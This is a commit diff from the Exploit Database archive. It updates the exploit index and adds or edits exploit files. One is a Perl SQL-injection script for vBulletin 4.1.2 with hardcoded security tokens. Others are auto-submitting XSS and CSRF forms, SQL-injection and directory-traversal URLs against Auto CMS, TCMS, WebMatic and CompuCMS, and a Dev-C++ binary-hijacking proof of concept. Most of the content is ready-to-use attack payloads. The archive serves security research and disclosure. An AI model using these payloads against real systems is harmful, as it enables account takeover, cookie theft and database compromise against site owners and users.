Updated 09_06_2014

This commit is contained in:
Offensive Security 2014-09-06 04:42:44 +00:00
parent c587ffef9c
commit bdd1b1c20a
8 changed files with 217 additions and 17 deletions

View file

@ -31013,7 +31013,7 @@ id,file,description,date,author,platform,type,port
34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0
34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0
34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 'SDL2.php' Cross Site Scripting Vulnerability",2010-10-22,"Amol Naik",php,webapps,0
34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 0.2.3 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision Vulnerability",2010-08-11,"Florian Zumbiehl",windows,remote,0
34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 'Topic' Field HTML Injection Vulnerability",2010-08-11,3ethicalhackers.com,php,webapps,0
34439,platforms/multiple/remote/34439.txt,"ServletExec Directory Traversal Vulnerability and Multiple Authentication-Bypass Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0
@ -31099,3 +31099,8 @@ id,file,description,date,author,platform,type,port
34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0
34530,platforms/windows/dos/34530.py,"Crystal Player v1.98 '.mls' File Buffer Overflow Vulnerability",2010-08-20,"Praveen Darshanam",windows,dos,0
34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 Cross Site Scripting Vulnerability",2010-08-25,"Aung Khant",php,webapps,0
34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 Multiple EXE Loading Arbitrary Code Execution Vulnerability",2010-08-25,storm,windows,remote,0
34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 'autocms.php' Cross-Site Scripting Vulnerability",2010-08-23,"High-Tech Bridge SA",php,webapps,0
34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0

Can't render this file because it is too large.

View file

@ -4,7 +4,7 @@
# Severity : High+/Critical
# Reporter(s) : Mehdi Karout & Christian Galeone
# Google Dork : inurl:wp/wp-content/force-download.php
# Plugin Version : 1.1
# Plugin Version : 0.2.3
# Plugin Name : Download ShortCode
# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
# Vendor Home : http://werdswords.com/

View file

@ -6,8 +6,7 @@
# Tested on: vBulletin 4.1.2
# Usage: perl exploit.pl <http://target> <valid username> <valid passwd> <existent group> <userid to hack>
# Tutorial video: https://www.youtube.com/watch?v=_jec3nkoYFc
# IMPORTANT: At the first execution of the exploit I suggest you to login and logout to the forum (with a browser), then running it in order to allow the exploit to retrieve the correct security token to use. If you run more than one time the exploit, it may not get the security token because of the previous session's cookies and so you may have some problems retrieving the correct information. THE SOLUTION IS to copy the correct security token previously found (usually at the first run) and paste it into the source code where I wrote 'HERE'.
# Vulnerability discovered by: D4rkB1t (http://www.exploit-db.com/exploits/17314/)
# Vulnerability discovered by: D4rkB1t
#!/usr/bin/env perl
use LWP::UserAgent;
@ -24,13 +23,14 @@ $salt = "salt) from user where userid=$ARGV[4]#";
sub request
{
$req = HTTP::Request->new(GET => $ARGV[0]);
my $res1 = $ua->request($req);
open(FILE01, "> vbloginout.txt"); print FILE01 $res1->content; close(FILE01);
my $token = dumping("vbloginout.txt","token");
if($token eq '')
if($token eq '' || $token eq 'guest')
{
print "SECURITYTOKEN not found (Make sure to log out from any other previous logged sessions before running the exploit).\n";
#print "Attempting using 1409594055-f2133dfe1f26a36f6349eb3a946ac38c94a182e6 as token.\n";
$token = "1409750140-51ac26286027a4bc2b2ac38a7483081c2a4b2a3e"; # HERE
print "SECURITYTOKEN not found!\n";
$token = "1409782759-e58c864fcc4e1ec7e23d31439af4b8cc181b789f"; # HERE
print "Attempting using $token as token.\n";
}
else
@ -48,7 +48,6 @@ sub request
$post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
$req->content($post);
my $res = $ua->request($req);
#print $res->headers()->as_string; print "\n\n";
open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
my $location = dumping("vbloc.txt","loc");
@ -57,11 +56,10 @@ sub request
banner();
break;
}
#print "Location: $location\n";
my $req1 = HTTP::Request->new(GET => $location);
$req1->content_type('application/x-www-form-urlencoded');
my $res1 = $ua->request($req1);
#print $res1->content; print "\n";
open(FILE,"> vbout.txt");
print FILE $res1->content;
close(FILE);
@ -91,7 +89,6 @@ sub second_request
$post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
$req->content($post);
my $res = $ua->request($req);
#print $res->headers()->as_string; print "\n\n";
open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
my $location = dumping("vbloc.txt","loc");
@ -100,11 +97,10 @@ sub second_request
banner();
exit(1);
}
#print "Location: $location\n";
my $req1 = HTTP::Request->new(GET => $location);
$req1->content_type('application/x-www-form-urlencoded');
my $res1 = $ua->request($req1);
#print $res1->content; print "\n";
open(FILE,"> vbout.txt");
print FILE $res1->content;
close(FILE);
@ -219,8 +215,6 @@ sub login(@)
$req->content("vb_login_username=$username&vb_login_password=$password&s=&securitytoken=1409514185-74f04ec0932a6f070268bf287797b5dc0db05530&do=login&vb_login_md5password=&vb_login_md5password_utf=");
$ua->cookie_jar({});
my $res = $ua->request($req);
#print "\n"; print $res->content; print "\n";
open(FILE2,"> vbloginout.txt"); print FILE2 $res->content; close(FILE2);
request();
}

30
platforms/php/webapps/34533.txt Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/42764/info
Auto CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Auto CMS 1.6 is vulnerable; other versions may be affected.
<form action="http://www.example.com/index.php" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="site_name" value="AutoCMS by Roberto Aleman" />
<input type="hidden" name="site_url" value="index.php" />
<input type="hidden" name="sitetitle" value=&#039;AutoCMS by Roberto Aleman"><script>alert("XSS")</script>&#039; />
<input type="hidden" name="admin_email" value="admin@example.com" />
<input type="hidden" name="admin_password" value="" />
<input type="hidden" name="css_file" value="black.css" />
<input type="hidden" name="index_name_link" value="Index" />
<input type="hidden" name="about_name_link" value="About" />
<input type="hidden" name="about_content" value="put about text here" />
<input type="hidden" name="ps_name_link" value="" />
<input type="hidden" name="ps_content" value="put producs and services text here" />
<input type="hidden" name="news_name_link" value="News" />
<input type="hidden" name="news_content" value="Title Example1: Text Example1/Title Example2: Text Example2/" />
<input type="hidden" name="contact_name_link" value="Contact" />
<input type="hidden" name="update" value="update" />
</form>
<script>
document.main.submit();
</script>

53
platforms/php/webapps/34534.txt Executable file
View file

@ -0,0 +1,53 @@
source: http://www.securityfocus.com/bid/42766/info
TCMS is prone to multiple input-validation vulnerabilities, including a local file-include vulnerability, a local file-disclosure vulnerability, multiple SQL-injection vulnerabilities, and multiple cross-site scripting vulnerabilities.
An attacker can exploit these vulnerabilities to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain potentially sensitive information, or execute arbitrary local scripts in the context of the webserver process; other attacks are also possible.
http://www.example.com/www/index.php?admin=1&section=content&action=edit&id=PAGE_ID'+ANY_SQL
http://www.example.com/www/index.php?template=home&content=home'+ANY_SQL
http://www.example.com/www/index.php?template=forum&action=showReplies&index=1'+ANY_SQL_CODE
http://www.example.com/www/index.php?template=blog&id=1'+ANY_SQL_CODE
<form action="http://www.example.com/www/index.php" method="post" name="main" >
<input type="hidden" name="template" value="3" />
<input type="hidden" name="language" value="1" />
<input type="hidden" name="name" value="home" />
<input type="hidden" name="note" value='The note text' />
<input type="hidden" name="value" value="page content" />
<input type="hidden" name="admin" value="1" />
<input type="hidden" name="text" value="1" />
<input type="hidden" name="section" value="content" />
<input type="hidden" name="id" value="9'+ANY_SQL_CODE" />
<input type="hidden" name="action" value="Save text" />
</form>
<script>
document.main.submit();
</script>
<form action="http://www.example.com/www/index.php" method="post" name="main" >
<input type="hidden" name="template" value="3" />
<input type="hidden" name="language" value="1" />
<input type="hidden" name="name" value="home" />
<input type="hidden" name="note" value='The note text"><script>alert(document.cookie)</script>' />
<input type="hidden" name="value" value="page content" />
<input type="hidden" name="admin" value="1" />
<input type="hidden" name="text" value="1" />
<input type="hidden" name="section" value="content" />
<input type="hidden" name="id" value="9" />
<input type="hidden" name="action" value="Save text" />
http://www.example.com/www/index.php?admin=1&section=language"><script>alert(document.cookie)</script>&action=addLanguage
</form>
<script>
document.main.submit();
</script>
http://www.example.com/www/index.php?template=./../../../../../../../tmp/test.php%00
http://www.example.com/www/index.php?admin=1&section=style&action=editStylesheet&name=./../../../../../../../tmp/test.php

61
platforms/php/webapps/34535.txt Executable file
View file

@ -0,0 +1,61 @@
source: http://www.securityfocus.com/bid/42767/info
Valarsoft WebMatic is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Valarsoft WebMatic 3.0.5 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/index.php" method="post" name="main" >
<input type="hidden" name="browser_bar_title" value="Webmatic" />
<input type="hidden" name="title" value="Welcome to Webmatic" />
<input type="hidden" name="special_user_label" value="Special user" />
<input type="hidden" name="staff_name" value="Webmatic editorial staff" />
<input type="hidden" name="home" value=&#039;Webmatic its2"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="foot" value="" />
<input type="hidden" name="signalation_email_subject" value="Subject" />
<input type="hidden" name="signalation_email_text" value="text" />
<input type="hidden" name="user_registration_email_subject" value="Subject" />
<input type="hidden" name="user_registration_email_text" value="text" />
<input type="hidden" name="send" value="Save" />
<input type="hidden" name="languageID" value="1" />
<input type="hidden" name="stage" value="2" />
<input type="hidden" name="section" value="21" />
<input type="hidden" name="action" value="578" />
</form>
<script>
document.main.submit();
</script>
<form action="http://www.example.com/index.php" method="post" name="main" >
<input type="hidden" name="title" value="pagetest" />
<input type="hidden" name="subtitle" value=&#039;some subtitle and"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="categoryID" value="1" />
<input type="hidden" name="page_type" value="1" />
<input type="hidden" name="visibility" value="1" />
<input type="hidden" name="groupID" value="1" />
<input type="hidden" name="backID" value="0" />
<input type="hidden" name="left_panels_enabled" value="1" />
<input type="hidden" name="right_panels_enabled" value="1" />
<input type="hidden" name="render_mode" value="2" />
<input type="hidden" name="head" value="" />
<input type="hidden" name="body" value="" />
<input type="hidden" name="hr_width" value="100" />
<input type="hidden" name="hr_size" value="1" />
<input type="hidden" name="hr_align" value="0" />
<input type="hidden" name="img_picture" value="1.gif" />
<input type="hidden" name="img_border" value="0" />
<input type="hidden" name="a_link" value="1" />
<input type="hidden" name="a_url" value="" />
<input type="hidden" name="a_text" value="" />
<input type="hidden" name="foot" value="" />
<input type="hidden" name="send" value="Save" />
<input type="hidden" name="stage" value="2" />
<input type="hidden" name="section" value="14" />
<input type="hidden" name="action" value="216" />
<input type="hidden" name="pageID" value="2" />
</form>
<script>
document.main.submit();
</script>

23
platforms/php/webapps/34536.txt Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/42773/info
CompuCMS is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.asp?mode=visresultat&sogeord=%27+ANY_SQL_CODE
http://www.example.com/index.asp?mode=for!forside!gb&sprog=gb'"><script>alert(document.cookie)</script>
http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=&site=demo%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ed&NoElementNum=0&NoFirstElement
http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&site=demo&NoElementNum=0&NoFirstElement
http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&vispic=2138&Dir=&site=demo&NoElementNum=0&NoFirstElement
http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg&tekst=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&tekst=
http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138+ANY_SQL_CODE&Dir=www.compucms.dk/demo/&site=demo&NoElementNum=0&NoFirstElement
http://www.example.com/demo/index.asp?mode=nyh!forside~1220010667!dk&visid=383%27+ANY_SQL_CODE

View file

@ -0,0 +1,34 @@
source: http://www.securityfocus.com/bid/42737/info
Bloodshed Dev-C++ is prone to a vulnerability that lets attackers execute arbitrary code. This issue affects 'make.exe' and 'minw32-make.exe'.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to compile a file from a network share location that contains a specially crafted executable file.
Bloodshed Dev-C++ 4.9.9.2 is vulnerable; other versions may also be affected.
/*
Exploit Title: Bloodshed Dev-C++ Binary Hijacking Exploit (make.exe, mingw32-make.exe)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Version: 4.9.9.2
Tested on: Windows Vista SP2
http://www.gonullyourself.org/
gcc -o make.exe Dev-C++-Binary.c
gcc -o mingw32-make.exe Dev-C++-Binary.c
...and place in appropriate directory. Executes your code four times.
Every file extension associated with Dev-C++ (.c, .cpp, .dev, .h, .hpp, .rc, .template) is affected. Dev-C++ Package Manager files (.devpackage, .devpak) are not affected, however.
*/
#include <windows.h>
int main()
{
WinExec("calc", 0);
exit(0);
return 0;
}